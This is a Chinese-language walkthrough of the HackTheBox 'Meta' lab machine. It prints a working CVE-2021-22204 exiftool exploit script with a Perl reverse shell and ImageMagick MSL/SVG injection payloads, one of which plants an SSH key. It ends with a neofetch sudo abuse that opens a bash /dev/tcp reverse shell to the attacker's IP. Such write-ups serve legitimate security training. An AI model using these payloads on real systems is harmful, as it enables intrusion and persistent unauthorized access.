HackTheBox-Meta

https://app.hackthebox.com/machines/429

nmap扫描结果

10.10.11.140 artcorp.htb添加到/etc/hosts


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ ./gobuster vhost -u http://artcorp.htb/ -w /mnt/hgfs/Exploits/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://artcorp.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /mnt/hgfs/Exploits/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/27 23:53:31 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]

===============================================================
2022/03/27 23:55:04 Finished
===============================================================

10.10.11.140 dev01.artcorp.htb添加到/etc/hosts


有个文件上传点http://dev01.artcorp.htb/metaview/index.php

上传png文件后,返回文件的ext信息

1
2
3
4
5
6
7
8
9
10
11
12
File Type                       : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 254
Image Height : 255
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Significant Bits : 8 8 8 8
Software : gnome-screenshot

推测这里可能存在imagemagick的漏洞ImageMagick 命令执行分析

但是试了一下貌似不对…

在生成imagemagick的利用payload时,发现exiftool的输出结果与网页回显的结果类似,推测其为exiftool

CVE-2021-22204-exiftool

convisolabs/CVE-2021-22204-exiftool


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/env python3

import base64
import subprocess

ip = '10.10.16.22'
port = '9090'

payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"


payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};".encode() )

payload = payload + b"'))};\")"


payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()


subprocess.run(['bzz', 'payload', 'payload.bzz'])
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
subprocess.run(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])

1
2
3
4
5
[email protected]:/var/www/dev01.artcorp.htb/metaview$ cat /etc/passwd | grep sh
cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash

linpeas.sh没有得到当前权限下的有效信息,传个pspy64监控下进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
2022/03/27 12:53:06 CMD: UID=0    PID=1      | /sbin/init 
2022/03/27 12:54:01 CMD: UID=0 PID=17947 | /usr/sbin/CRON -f
2022/03/27 12:54:01 CMD: UID=0 PID=17946 | /usr/sbin/cron -f
2022/03/27 12:54:01 CMD: UID=0 PID=17945 | /usr/sbin/CRON -f
2022/03/27 12:54:01 CMD: UID=0 PID=17944 | /usr/sbin/CRON -f
2022/03/27 12:54:01 CMD: UID=0 PID=17943 | /usr/sbin/cron -f
2022/03/27 12:54:01 CMD: UID=0 PID=17949 | /usr/sbin/CRON -f
2022/03/27 12:54:01 CMD: UID=0 PID=17948 | /usr/sbin/CRON -f
2022/03/27 12:54:01 CMD: UID=1000 PID=17952 | /usr/local/bin/mogrify -format png *.*
2022/03/27 12:54:01 CMD: UID=1000 PID=17951 | /bin/bash /usr/local/bin/convert_images.sh
2022/03/27 12:54:01 CMD: UID=1000 PID=17950 | /bin/sh -c /usr/local/bin/convert_images.sh
2022/03/27 12:54:01 CMD: UID=0 PID=17957 | rm /tmp/systemd-private-44572498d12c46d58d79d44419a7b8db-apache2.service-288m5B /tmp/systemd-private-44572498d12c46d58d79d44419a7b8db-systemd-timesyncd.service-uK7uJf /tmp/vmware-root_473-2092907038
2022/03/27 12:54:01 CMD: UID=0 PID=17956 | cp -rp /root/conf/config_neofetch.conf /home/thomas/.config/neofetch/config.conf
2022/03/27 12:54:01 CMD: UID=0 PID=17955 | /bin/sh -c rm /var/www/dev01.artcorp.htb/convert_images/*
2022/03/27 12:54:01 CMD: UID=0 PID=17954 | /bin/sh -c rm /var/www/dev01.artcorp.htb/convert_images/*
2022/03/27 12:54:01 CMD: UID=0 PID=17953 | /bin/sh -c rm /tmp/*
2022/03/27 12:54:01 CMD: UID=0 PID=17959 | /bin/sh -c rm /var/www/dev01.artcorp.htb/metaview/uploads/*
2022/03/27 12:54:01 CMD: UID=1000 PID=17958 | pkill mogrify

/usr/local/bin/convert_images.sh

1
2
3
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

1
2
3
4
5
6
7
8
9
<image authenticate='ff" `echo $(id)> /dev/shm/out`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>

cp poc.svg /var/www/dev01.artcorp.htb/convert_images/即可

1
2
3
4
5
6
7
8
9
<image authenticate='ff" `mkdir -p /home/thomas/.ssh;echo ssh-rsa AAAABxxx97s= [email protected] > /home/thomas/.ssh/authorized_keys;echo $(whoami)> /dev/shm/out`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>


1
2
3
4
5
6
7
8
[+] [CVE-2019-13272] PTRACE_TRACEME

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.

1
2
3
4
5
6
[email protected]:~$ sudo -l
Matching Defaults entries for thomas on meta:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
(root) NOPASSWD: /usr/bin/neofetch \"\"

https://gtfobins.github.io/gtfobins/neofetch/

但不能直接利用

https://github.com/dylanaraps/neofetch/wiki/Customizing-Info

修改.config/neofetch/config.conf

prin "$(id)"然后export XDG_CONFIG_HOME=/home/thomas/.config/

prin "$(sh -i >& /dev/tcp/10.10.16.22/9001 0>&1)"